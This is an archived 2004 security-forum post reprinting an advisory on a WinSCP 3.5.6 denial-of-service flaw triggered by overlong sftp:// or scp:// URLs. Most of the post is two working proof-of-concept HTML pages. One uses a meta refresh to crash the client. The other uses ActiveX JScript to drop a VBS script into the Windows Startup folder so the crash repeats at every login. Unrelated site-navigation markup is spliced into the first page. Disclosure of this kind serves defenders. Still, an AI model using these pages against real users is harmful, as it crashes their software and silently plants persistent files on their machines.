Winscp Denial Of Service

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Apr 29 2004, 04:25 AM

QUOTE

WinSCP Denial of Service
------------------------------------------------------------------------

SUMMARY

<http://winscp.sourceforge.net> WinSCP is "an open source SFTP (SSH File
Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH
(Secure SHell). Its main function is safe copying of files between a local
and a remote computer". A malicious attacker can send an email containing
a link that will cause WinSCP to crash.

DETAILS

Vulnerable Systems:
* WinSCP version 3.5.6 (prior versions might be also vulnerable)

The default installation of WinSCP provides the user with functionality to
handle sftp:// and scp:// addresses. The vulnerability exists due to the
way the application handles long URL's. A malformed scp:// or sftp://
address embedded in a HTML tag causes the WinSCP application to exhaust
CPU and Memory resources. The attacker would need the ability to convince
the user to visiting a web site he controlled or opening an HTML e-mail he
had prepared. During the denial of service, WinSCP will not display any
GUI.

Proof of Concept:
------ WinSCP_DoS1.html --------

<HTML>
<HEAD>
<TITLE>WinSCP DoS</TITLE>

<meta http-equiv="Refresh" content="0; URL=sftp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">

</head> <body> <table width="100%" border="0" cellspacing="1" cellpadding="1"> <tr> <td width="15%" height="341" align="left" valign="top"><p><a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/forums2.png" alt="hacking exploits security forum" width="189" height="102" border="0" /></a><br /> <a href="http://www.governmentsecurity.org/forum/"><img src="../new_images/hacking.png" alt="hacking" width="190" height="84" border="0" /></a><br/> <a href="../compliance.php"><img src="../new_images/compliance_articles.png" alt="compliance articles" width="190" height="84" border="0" /></a><br/> <a href="http://governmentsecurity.bitpipe.com/data/detail?id=1206033259_610&type=RES&psrc=TPP"><img src="../new_images/main_ad_1.png" alt="security white papers" width="190" height="84" border="0" /></a><br/> <a href="../directory.php"><img src="../new_images/main_ad_2.png" alt="information security consultant" width="190" height="84" border="0" /></a></p> </td> <td width="85%" align="left" valign="top">
</BODY>
</HTML>

-------- WinSCP_DoS2.html -------

<html>
<head>
<title>WinSCP DoS</title>

<script language="JScript">

var WshShell = new ActiveXObject("WScript.Shell");
strSU = WshShell.SpecialFolders("StartUp");

var fso = new ActiveXObject("Scripting.FileSystemObject");
var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true);

vibas.WriteLine("Dim shell");
vibas.WriteLine("Dim quote");
vibas.WriteLine("Dim DoS");
vibas.WriteLine("Dim param");
vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\"");
vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"");
vibas.WriteLine("set shell =
WScript.CreateObject(\"WScript.Shell\")");
vibas.WriteLine("quote = Chr(34)");
vibas.WriteLine("pgm = \"explorer\"");
vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param");

vibas.Close();

</script>

</head>
</html>

ADDITIONAL INFORMATION

The information has been provided by <mailto:luca.e@seeweb.it> Luca
Ercoli.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.